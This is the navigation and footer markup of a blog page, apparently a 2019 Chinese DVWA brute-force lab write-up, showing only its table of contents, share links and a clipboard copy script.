      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Low"><span class="toc-number">2.</span> <span class="toc-text">Low</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码"><span class="toc-number">2.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#方法一：Burpsuite爆破"><span class="toc-number">2.2.1.</span> <span class="toc-text">方法一：Burpsuite爆破</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL注入"><span class="toc-number">2.2.2.</span> <span class="toc-text">SQL注入</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Medium"><span class="toc-number">3.</span> <span class="toc-text">Medium</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-1"><span class="toc-number">3.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用-1"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#High"><span class="toc-number">4.</span> <span class="toc-text">High</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-2"><span class="toc-number">4.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用-2"><span class="toc-number">4.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Impossible"><span class="toc-number">5.</span> <span class="toc-text">Impossible</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#核心代码-3"><span class="toc-number">5.1.</span> <span class="toc-text">核心代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#关于PDO："><span class="toc-number">5.2.</span> <span class="toc-text">关于PDO：</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&text=DVWA之Brute Force"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&is_video=false&description=DVWA之Brute Force"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DVWA之Brute Force&body=Check out this article: http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&title=DVWA之Brute Force"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&name=DVWA之Brute Force&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://imysec.github.io/2019/04/13/dvwa-zhi-brute-force/&t=DVWA之Brute Force"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menú</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Compartir</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Cap amunt</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2020
    忆时光
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Inici</a></li>
         
          <li><a href="/about/">Qui som</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/projects_url">Projectes</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<!-- clipboard -->

  <script src="/lib/clipboard/clipboard.min.js"></script>
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"In die Zwischenablage kopiert!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Kopiert!");
      e.clearSelection();
    })
  })
  </script>

<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
